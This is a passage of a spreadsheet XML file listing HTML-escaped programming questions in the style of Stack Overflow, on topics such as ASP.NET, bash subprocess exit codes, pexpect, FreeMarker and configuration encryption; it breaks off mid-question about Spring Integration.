    <t xml:space="preserve">&lt;p&gt;I want my S60 Application to utilize the Stomp protocol.&lt;/p&gt;
&lt;p&gt;Although it would be fairly simple to implement myself (but nothing is ever as simple as I hope with Symbian) - I am wondering if anyone has any experience in this already.&lt;/p&gt;
&lt;p&gt;It seems a Stomp library exists in almost every other language already. The closest match for Symbian would be the C++ library listed &lt;a href="http://stomp.codehaus.org/Clients" rel="nofollow"&gt;here&lt;/a&gt; but that is embedded quite integrally within the ActiveMQ source.&lt;/p&gt;
&lt;p&gt;Can anyone offer any advice/experience?&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET MVC public alternative to UrlHelper.GenerateUrl</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to embed a link to a controller action in my page so I can use it from javascript. Something like&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var pollAction = '/Mycontroller/CheckStatus'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now I am happy to hardcode it, but it would be really nice if there were a method I could use to create the URL. The AjaxHelper/HtmlExtensions contain methods to create hyperlinks (.ActionLink(...) and so on), but if you look into the guts of them, they rely on a method called UrlHelper.GenerateUrl() to resolve a controller and action into a url. This is internal so I can't really get at this.&lt;/p&gt;
&lt;p&gt;Anyone found a good method in the framework to do this? Or must I roll my own?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>The best way to store class instances to a file/database</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the best way to store instances of a class to file/database?&lt;/p&gt;
&lt;p&gt;We have a base class called Command and loads of derived classes.
Users create instances of these classes by adding commands to a graphical designer
where they can configure them. (Set the properties).&lt;/p&gt;
&lt;p&gt;We then need a way to store these "commands" to a file without losing
any information.&lt;/p&gt;
&lt;p&gt;One idea was to use db4o, but the GPL license is not acceptable for this project.&lt;/p&gt;
&lt;p&gt;Any suggestions or code samples?&lt;/p&gt;
&lt;p&gt;Update:&lt;/p&gt;
&lt;p&gt;(In order to "de-blurryfie" my question :p)&lt;/p&gt;
&lt;p&gt;The generated code might look something like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    command[i++] = new DelayInSecondsCommand(2);
    command[i++] = new DaliRequestCommand(1, false, 254);
    command[i++] = new DaliRequestCommand(2, false, 254);
    command[i++] = new DaliRequestCommand(3, false, 254);
    command[i++] = new WaitInSecondsCommand(2);             
    command[i++] = new DaliRequestCommand(1, false, 0);
    command[i++] = new DaliRequestCommand(2, false, 0);
    command[i++] = new DaliRequestCommand(3, false, 0);
    command[i++] = new JumpCommand(0);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But then with loads of different commands.&lt;/p&gt;
&lt;p&gt;I know it's possible with .NET serialization, altough I've never used it before,
but I was wondering if there are better alternatives, like I said db4o seems nice but the license doesn't fit the project.&lt;/p&gt;
&lt;p&gt;Update 2:&lt;/p&gt;
&lt;p&gt;Thank you for the replies. I'll probably go with the serialization solution now,
but I'll look into the other options as well. F.Y.I. data is stored in a SQL Compact database.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Caching HTML output with PHP</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to create a cache for my php pages on my site. I did find too many solutions but what I want is a script which can generate an HTML page from my database ex:&lt;/p&gt;
&lt;p&gt;I have a page for categories which grabs all the categories from the DB, so the script should be able to generate an HTML page of the sort: my-categories.html. then if I choose a category I should get a my-x-category.html page and so on and so forth for other categories and sub categories.&lt;/p&gt;
&lt;p&gt;I can see that some web sites have got URLs like: wwww.the-web-site.com/the-page-ex.html&lt;/p&gt;
&lt;p&gt;even though they are dynamic.&lt;/p&gt;
&lt;p&gt;thanks a lot for help&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is Microsoft OSLO?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it a DSL generation tool or natural query language?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I display Arabic data in Crystal Reports?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using Crystal Reports 10. The reports are obtaining data from an Oracle 10G database. We have some data in Arabic. When I try to display the Arabic data it is showing as ?.&lt;/p&gt;
&lt;p&gt;Any ideas on what I can do to display this correctly?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How is Domain Driven Design different from just using a specification?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I read that Domain Driven Design is about concentrating on the problem domain instead of concentrating on the software. They say that it is easier to solve the complexities of the problem domain than the complexities of the software, because after you have solved the domain, you know better how to build the software, too. Also they say that actually the domain is more complex than the structures of the software or that if you don't see the forest from the woods, you are in trouble.&lt;/p&gt;
&lt;p&gt;But how is Domain Driven Design different from just using a specification for the software? I mean, of course we should get to know the problem domain before we start coding. Is DDD reinventing the wheel?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you test for the existence of a user in SQL Server?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'd like to drop a user in a SQL Server script but I'll need to test for existence first or I'll get script errors.  When dropping tables or stored procs, I check the sysobjects table like so:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;IF EXISTS (
    SELECT * 
    FROM   sysobjects 
    WHERE  id = object_id(N'[dbo].[up_SetMedOptions]') 
    AND    OBJECTPROPERTY(id, N'IsProcedure') = 1
)
Drop Procedure up_SetMedOptions;
GO
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What is the corollary for checking for a user?  Note that I am NOT asking about a database login to the server!  The question pertains to a User in a specific database.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Have ReSharper keep 'using System;' when optimizing usings</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I was wondering if there is some option to keep ReSharper from removing just the &lt;code&gt;using System;&lt;/code&gt; directive? Perhaps this is configurable somewhere?&lt;/p&gt;
&lt;p&gt;Also, is there a way to have ReSharper sort the remaining directives just as Visual Studio 2008 does it (alphabetically, I think)?&lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to find out the TabSelection</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have using the following code for developing tabs.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$(document).ready(function() {
    $('#container-1').tabs();
}
 ....
&amp;lt;div id="container-1"&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;&amp;lt;a href="#fragment-1"&amp;gt;&amp;lt;span&amp;gt;Home&amp;lt;/span&amp;gt;&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;&amp;lt;a href="#fragment-2"&amp;gt;&amp;lt;span&amp;gt;Contact&amp;lt;/span&amp;gt;&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/div&amp;gt;
...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It works fine! I need the tab click event. If it is the &lt;em&gt;Home&lt;/em&gt; tab click, I have to do &lt;code&gt;alert();&lt;/code&gt;. How do I achieve this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to compute the nth root of a very big integer</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need a way to compute the nth root of a long integer in Python. &lt;/p&gt;
&lt;p&gt;I tried &lt;code&gt;pow(m, 1.0/n)&lt;/code&gt;, but it doesn't work:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;OverflowError: long int too large to convert to float&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Any ideas?&lt;/p&gt;
&lt;p&gt;By long integer I mean REALLY long integers like:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;11968003966030964356885611480383408833172346450467339251
  196093144141045683463085291115677488411620264826942334897996389
  485046262847265769280883237649461122479734279424416861834396522
  819159219215308460065265520143082728303864638821979329804885526
  557893649662037092457130509980883789368448042961108430809620626
  059287437887495827369474189818588006905358793385574832590121472
  680866521970802708379837148646191567765584039175249171110593159
  305029014037881475265618958103073425958633163441030267478942720
  703134493880117805010891574606323700178176718412858948243785754
  898788359757528163558061136758276299059029113119763557411729353
  915848889261125855717014320045292143759177464380434854573300054
  940683350937992500211758727939459249163046465047204851616590276
  724564411037216844005877918224201569391107769029955591465502737
  961776799311859881060956465198859727495735498887960494256488224
  613682478900505821893815926193600121890632&lt;/p&gt;
&lt;/blockquote&gt;
</t>
  </si>
  <si>
    <t>How to wait in bash for several subprocesses to finish and return exit code !=0 when any subprocess ends with code !=0?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How to wait in a bash script for several subprocesses spawned from that script to finish and return exit code !=0 when any of the subprocesses ends with code !=0 ?&lt;/p&gt;
&lt;p&gt;Simple script:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#!/bin/bash
for i in `seq 0 9`; do
  doCalculations $i &amp;amp;
done
wait
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The above script will wait for all 10 spawned subprocesses, but it will always give exit status 0 (see &lt;code&gt;help wait&lt;/code&gt;). How can I modify this script so it will discover exit statuses of spawned subprocesses and return exit code 1 when any of subprocesses ends with code !=0?&lt;/p&gt;
&lt;p&gt;Is there any better solution for that than collecting PIDs of the subprocesses, wait for them in order and sum exit statuses?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to write a unix filter that outputs only a line every N lines</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Suppose to feed the filter standard input with these line:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;line 1 
line 2
line 3
line 4 
line 5
line 6
line 7
line 8
line 9
line 10
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It would be nicer if someone tell me how to write a script that prints only every 4 lines, in the case of the example input above:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;line 1
line 5
line 9
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Designing Address validation for app</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am planning to design an address validation for users registering in my app. Possibly validating by zipcode and state.&lt;/p&gt;
&lt;p&gt;Any idea how to handle addresses from around the globe?&lt;/p&gt;
&lt;p&gt;Do i need to insert all the zipcodes in the database and then validate the address. Any possible suggestion for the implementation?&lt;/p&gt;
&lt;p&gt;Thanks and Welcome :)
Krisp&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Build dependency tree from csproj files</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm currently using msbuild for a solution of over 600 projects.  &lt;/p&gt;
&lt;p&gt;Imagine I change the code for 1 library that is used by 10 projects.  Instead of providing all 600 projects to msbuild and let it compile all of them and figure out the dependencys.  I was wondering if there was a program or library I could use that would analyse the dependencys of all 600 projects, and allow me to only compile the 11 that are necessary.&lt;/p&gt;
&lt;p&gt;In other words given the input of all 600 projects to scan, and BaseLibrary.csproj as a project that has been modified parameter, provide me only the 11 projects I need to compile as output.&lt;/p&gt;
&lt;p&gt;I'm experienced in writing custom tasks, I'd just rather use a third party library to do the dependency analysis if there is already one out there.&lt;/p&gt;
&lt;p&gt;My company does incremental releases to production every 3-4 months.  As an experiment I wrote a custom task that looks at the previous releases "Subversion tag" and evaluates all the compiled files that have changed since then and maps them to a project.   &lt;/p&gt;
&lt;p&gt;The only use case I can think of that doesn't work is the one I mentioned where a base library is changed and the system doesn't know about all the projects that depend on it.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Regular Expression to Extract HTML Body Content</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am looking for a regex statement that will let me extract the HTML content from just between the body tags from a XHTML document.&lt;/p&gt;
&lt;p&gt;The XHTML that I need to parse will be very simple files, I do not have to worry about JavaScript content or &lt;code&gt;&amp;lt;![CDATA[&lt;/code&gt; tags, for example.&lt;/p&gt;
&lt;p&gt;Below is the expected structure of the HTML file is that I have to parse. Since I know exactly all of the content of the HTML files that I am going to have to work with, this HTML snippet pretty much covers my entire use case. If I can get a regex to extract the body of this example, I'll be happy.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"&amp;gt;
&amp;lt;html xmlns="http://www.w3.org/1999/xhtml"&amp;gt;
  &amp;lt;head&amp;gt;
    &amp;lt;title&amp;gt;
    &amp;lt;/title&amp;gt;
  &amp;lt;/head&amp;gt;
  &amp;lt;body contenteditable="true"&amp;gt;
    &amp;lt;p&amp;gt;
      Example paragraph content
    &amp;lt;/p&amp;gt;
    &amp;lt;p&amp;gt;
      &amp;amp;nbsp;
    &amp;lt;/p&amp;gt;
    &amp;lt;p&amp;gt;
      &amp;lt;br /&amp;gt;
      &amp;amp;nbsp;
    &amp;lt;/p&amp;gt;
    &amp;lt;h1&amp;gt;Header 1&amp;lt;/h1&amp;gt;
  &amp;lt;/body&amp;gt;
&amp;lt;/html&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Conceptually, I've been trying to build a regex string that matches everything BUT the inner body content. With this, I would use the C# &lt;code&gt;Regex.Split()&lt;/code&gt; method to obtain the body content. I thought this regex:&lt;/p&gt;
&lt;pre class="lang-none prettyprint-override"&gt;&lt;code&gt;((.|\n)*&amp;lt;body (.)*&amp;gt;)|((&amp;lt;/body&amp;gt;(*|\n)*)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;...would do the trick, but it doesn't seem to work at all with my test content in RegexBuddy.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>CSS Positioning, want to make content's width fixed when window is resized</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a div with two nested divs inside, the (float:left) one is the menu bar, and the right (float:right) should display whatever content the page has, it works fine when the window is at a maximum, but when i resize it the content is collapsed until it can no longer has any space, at which it is forced to be displayed BELOW the left menu bar, how can I make the width fixed so that the user may scroll when resized? 
(css    width    didn't work, i alternated between floating the right content and not), here is the code:    &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;div style="width:100%"&amp;gt;
&amp;lt;div style="float:left; background:#f5f5f5; border-right:1px solid black; height:170%; width:120px;"&amp;gt;&amp;lt;/div&amp;gt;   
&amp;lt;div style="margin-right:2px;margin-top:15px; margin-bottom:5px; width:100%; border:1px solid #f5f5f5"&amp;gt;&amp;lt;/div&amp;gt; 
&amp;lt;/div&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I only need to have this working on Interner Explorer for now. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>LINQ to SQL object versioning</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to create a LINQ to SQL class that represents the "latest" version of itself.&lt;/p&gt;
&lt;p&gt;Right now, the table that this entity represents has a single auto-incrementing ID, and I was thinking that I would add a version number to the primary key. I've never done anything like this, so I'm not sure how to proceed. I would like to be able to abstract the idea of the object's version away from whoever is using it. In other words, you have an instance of this entity that represents the most current version, and whenever any changes are submitted, a new copy of the object is stored with an incremented version number.&lt;/p&gt;
&lt;p&gt;How should I proceed with this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C# Extracting a name from a string</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to extract 'James\, Brown' from the string below but I don't always know what the name will be. The comma is causing me some difficuly so what would you suggest to extract James\, Brown?&lt;/p&gt;
&lt;p&gt;OU=James\, Brown,OU=Test,DC=Internal,DC=Net&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>A good library for converting PDF to TIFF?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need a Java library to convert PDFs to TIFF images. The PDFs are faxes, and I will be converting to TIFF so that I can then do barcode recognition on the image. Can anyone recommend a good library (free or $$) for conversion from PDF to TIFF? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Select object when a property equals Max with NHibernate</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have a query that selects rows depending on the value of another, ie. the max.  I don't think that really makes much sense, so here is the query:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var deatched = DetachedCriteria.For&amp;lt;Enquiry&amp;gt;("e2")
   .SetProjection(Projections.Alias(Projections.Max("Property"), "maxProperty"))
   .Add(Restrictions.EqProperty("e2.EnquiryCode", "e.EnquiryCode"));
session.CreateCriteria(typeof(Enquiry), "e")
   .Add(Subqueries.PropertyEq("Property", deatched))
   .AddOrder(Order.Asc("EnquiryCode"));
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;My question is, is this the best way?  Can anyone suggest a better way?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>OOP design question - keeping track of many similar things</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm designing a Data Access layer for an C#/ASP.net application and I have a question regarding the treatment of parameters in sql queries.&lt;/p&gt;
&lt;p&gt;At the moment, when a query needs a dynamically set parameter for the Where clause I have to (1) define a variable to hold the value, (2) add a new QueryStringParameter to the SqlDataSource's SelectParameters collection, (3) set the temporary value of the parameter when the method containing the query is called, (4) and set the value of the parameter on the Selecting event of the SqlDataSource.&lt;/p&gt;
&lt;p&gt;I have a list of ~20 parameters that are used throughout the different queries and it seems as though I should be able to define each once and simply tell the method which to use (and update it's value appropriately).&lt;/p&gt;
&lt;p&gt;Is there a good way to set this up?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Obfuscating a .NET Web application</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to obfuscate a .NET web application? I tried to use the Dotofuscator tool that comes with Visual Studio 2005 and I was able to obfuscate the dlls of a precompiled web site, but when I deployed the soultion to an IIS server, I could not the pages of the application.&lt;/p&gt;
&lt;p&gt;So the question would be: was any of you able to obfuscate a complete .NET web application?&lt;/p&gt;
&lt;p&gt;Thanks for your answers&lt;/p&gt;
&lt;p&gt;EDIT: I obfuscated all the dlls on the bin folder. The site is built without allowing updates of the aspx files. After that when I go to &lt;a href="http://serveradress/main.aspx" rel="nofollow"&gt;http://serveradress/main.aspx&lt;/a&gt;, I get an error saying that main.aspx does not exists&lt;/p&gt;
&lt;p&gt;PD: I need to obfuscate the code because the application does some license chcecking and I want to make it harder to remove the license checking code&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Pexpect, running ssh-copy-id is hanging when trying to spawn a second process</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm doing a Python script where I need to spawn several ssh-copy-id processes, and they need for me to type in a password, so i'm using PExpect.&lt;/p&gt;
&lt;p&gt;I have basically this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;child = pexpect.spawn('command')
child.expect('password:')
child.sendline('the password')
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and then I want to spawn another process, I don't care about this one anymore, whether it ended or not.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;child = pexpect.spawn('command2')
child.expect('password:')
child.sendline('the password')
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And the code is hanging at the second "spawn"&lt;/p&gt;
&lt;p&gt;However, if I comment out the first call, the second one works, so i'm guessing that the fact that the first one is still running or something is keeping it from working.&lt;/p&gt;
&lt;p&gt;Now, the other thing I haven't been able to do is wait until the first one stops.
I've tried:&lt;br /&gt;
child.close() - it hangs (both with True and False as parameters)
child.read(-1) - it hangs&lt;br /&gt;
child.expect(pexpect.EOF) - it hangs.&lt;br /&gt;
child.terminate() - it hangs  (both with True and False as parameters)&lt;/p&gt;
&lt;p&gt;Any ideas on what could be happening?&lt;br /&gt;
NOTE: I'm not a Python expert, and i have never used pexpect before, so ANY idea is more than welcome.&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;UPDATE: This is definitely related to ssh-copy-id, because with other processes, spawn works well even if they don't return.
Also, apparently ssh-copy-id never returns an EOF.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C++ Functors - and their uses</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I keep hearing a lot about functors in C++. Can someone give me an overview as to what they are and in what cases they would be useful?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Using a user defined parameter in vba</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an access database that ouptuts a query to an excel file.  The query uses a date parameter to run.  This parameter is chosen by the user.  I would like to use the parameter in the filename of the export.  How can I accomplish that with the minimum amount of code.&lt;/p&gt;
&lt;p&gt;01 01 09&lt;/p&gt;
&lt;p&gt;Ok the new year has begun.  sorry for the delay but I was on Holiday.&lt;/p&gt;
&lt;p&gt;Details.  &lt;/p&gt;
&lt;p&gt;I have an access Database that outputs a report in excel format, the report is dependent on a date parameter that is chosen by the user.  This parameter is selected via a textbox (text100) that has a pop up calendar. I would like to use the date in the text box(text100) in the filename.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to clone a jQuery Listen plugin event?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have some &lt;code&gt;&amp;lt;tr&amp;gt;&lt;/code&gt; elements on my page with a &lt;code&gt;click()&lt;/code&gt; event attached to an image that sits inside each one. I use this code&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$(this).clone(true).appendTo("table#foo");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;to do the following:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;copy those &lt;code&gt;&amp;lt;tr&amp;gt;&lt;/code&gt;s into a different table&lt;/li&gt;
&lt;li&gt;preserve the click events on the images inside the &lt;code&gt;&amp;lt;tr&amp;gt;&lt;/code&gt;s (because of the &lt;code&gt;true&lt;/code&gt; argument)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;All of that works fine. Now I have added a &lt;a href="http://plugins.jquery.com/project/Listen" rel="nofollow"&gt;jQuery Listen&lt;/a&gt; event to those &lt;code&gt;&amp;lt;tr&amp;gt;&lt;/code&gt;s, so that a user doesn't have to aim precisely: he/she can click anywhere on the &lt;code&gt;&amp;lt;tr&amp;gt;&lt;/code&gt; and I can pass the click to the image.&lt;/p&gt;
&lt;p&gt;It's coded like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$('tr.record').listen('click','td',function(){
  $(this).parent().find("img.clickable").click();
});
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The listen() event works fine on the original item, but &lt;strong&gt;on the cloned item, the listen() event fails.&lt;/strong&gt; The image's click event still works fine.&lt;/p&gt;
&lt;p&gt;Here is what Firebug tells me:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;m(this, e.type) is undefined
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;...and it references line 9 of jquery.listen-1.0.3-min.js.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;How can I can make the listen() event work on the cloned elements?&lt;/strong&gt;&lt;/p&gt;
&lt;h2&gt;Update&lt;/h2&gt;
&lt;p&gt;By default, jQuery doesn't copy events on cloned elements, but &lt;a href="http://plugins.jquery.com/project/copyEvents" rel="nofollow"&gt;this plugin&lt;/a&gt; is made to do that.&lt;/p&gt;
&lt;p&gt;Meanwhile, the author of the listen() plugin suggested a different strategy - see my answer below.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Memory Mapped Files .NET</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a project and it needs to access a large amount of proprietary data in ASP.NET.  This was done on the Linux/PHP by loading the data in shared memory.  I was wondering if trying to use Memory Mapped Files would be the way to go, or if there is a better way with better .NET support.  I was thinking of using the Data Cache but not sure of all the pitfalls of size of data being saved in the Cache.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET/C# - Detect File Size from Other Server?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to find the file size of a file on a server. The following code I got from &lt;a href="http://www.thejackol.com/2005/06/11/aspnet-get-file-size/" rel="nofollow"&gt;this guy&lt;/a&gt; accomplishes that for your own server:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;string MyFile = "~/photos/mymug.gif";
FileInfo finfo = new FileInfo(Server.MapPath(MyFile));
long FileInBytes = finfo.Length;
long FileInKB = finfo.Length / 1024;
Response.Write("File Size: " + FileInBytes.ToString() + 
  " bytes (" + FileInKB.ToString() + " KB)");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It works. However, I want to find the filesize of, for example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;string MyFile = "http://www.google.com/intl/en_ALL/images/logo.gif";
FileInfo finfo = new FileInfo(MyFile);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Then I get a pesky error saying &lt;code&gt;URI formats are not supported.&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;How can I find the file size of Google's logo with ASP.NET?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can configuration data be encrypted from an installation process?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am developing a .NET (2.0) WinForms utility that connects to a SQL Server 2005 database. I have found reference material, such as &lt;a href="http://stackoverflow.com/questions/42833/how-do-i-avoid-having-the-database-password-stored-in-plaintext-in-sourcecode"&gt;Avoiding Plaintext Passwords&lt;/a&gt; for handling the actual encryption of the connection string data. I now need to implement the encryption during the installation process so that an administrator can install the utility on a user's desktop, but not provide the user with the database connection information.&lt;/p&gt;
&lt;p&gt;The sample code all seems geared toward performing the encrypting within the primary application. So the app would need to be executed once for the encryption to take place. If the application is installed but not executed, the configuration information would be in plain text in the configuration file.&lt;/p&gt;
&lt;p&gt;Can anyone provide information showing how the encryption can be performed from the setup app. Other approaches to the problem are welcome as well (however, due to business requirements, I am not in a position to require Windows authentication for the database connection - I am limited to SQL Server authentication).&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt;
I may have been overly brief with my description. We have already performed a risk assessment and determined that using the built-in .NET framework functionality for encrypting the connection information provides sufficient security for the application. &lt;/p&gt;
&lt;p&gt;We understand that a truly determined individual could eventually obtain the connection information, and we readily accept that risk. The purpose of encrypting the connection data is to simply raise the bar of effort and to help "keep honest people honest".&lt;/p&gt;
&lt;p&gt;Having already worked out the means of performing the encryption, I am now trying to work out a method of performing the encryption from within the installation process. Any help along those lines woul be appreciated. Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Load FreeMarker templates from database</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to store my FreeMarker templates in a database table that looks something like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;template_name | template_content
---------------------------------
hello         |Hello ${user}
goodbye       |So long ${user}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When a request is received for a template with a particular name, this should cause a query to be executed, which loads the relevant template content. This template content, together with the data model (the value of the 'user' variable in the examples above), should then be passed to FreeMarker.&lt;/p&gt;
&lt;p&gt;However, the &lt;a href="http://freemarker.sourceforge.net/docs/api/index.html"&gt;FreeMarker API&lt;/a&gt; seems to assume that each template name corresponds to a file of the same name within a particular directory of the filesystem. Is there any way I can easily have my templates loaded from the DB instead of the filesystem?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt; I should have mentioned that I would like to be able to add templates to the database while the application is running, so I can't simply load all templates at startup into a new StringTemplateLoader (as suggested below).&lt;/p&gt;
&lt;p&gt;Cheers,
Don&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Bypass IE "The webpage you are viewing..." pop up</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to bypass the following IE popup box:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;The webapge you are viewing is trying
  to close the window. Do you want to
  close this window? Yes|No&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This is occurring when I add window.close() to the onclick event of an asp.net button control.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I call .NET code (C#/vb.net) from vbScript?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I imagine I can compile a C# DLL and then expose it as a COM object so that it can be CreateObject'd from VBscript.  I'm just not sure the steps involved in doing this...&lt;/p&gt;
</t>
  </si>
  <si>
    <t>.NET - How to build themes for big CSS files</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am in charge of providing a theme functionality for a site using a big CSS file (thousands of elements) I've just inherited.
Basically we want to allow the user to be able to change the colors on the screen.&lt;/p&gt;
&lt;p&gt;Every CSS element, besides color definition also have lots of other attributes - size, font, float, etc... As well a specific color appears in various CSS elements.&lt;/p&gt;
&lt;p&gt;If I use the Theme functionality of ASP.NET to have a different CSS file per theme, I have to duplicate my CSS file across all the themes, and it becomes a maintenance nightmare. &lt;/p&gt;
&lt;p&gt;Optimally I would like to have a single CSS file (for maintenance) and be able to change the color attributes only.&lt;/p&gt;
&lt;p&gt;What are the options here?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>reporting services anonymous access to reports</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I can't create a NT account for everyone that need access to the reports.
Does anyone know or have a link to the info to allow anonymous access to reporting services reports ?&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Spring Integration 1.0 RC2: Streaming file content?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been trying to find information on this, but due to the immaturity of the Spring Integration framework I haven't had much luck.&lt;/p&gt;
&lt;p&gt;Here is my desired work flow:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;New files are placed in an 'Incoming' directory&lt;/p&gt;&lt;/li&gt;
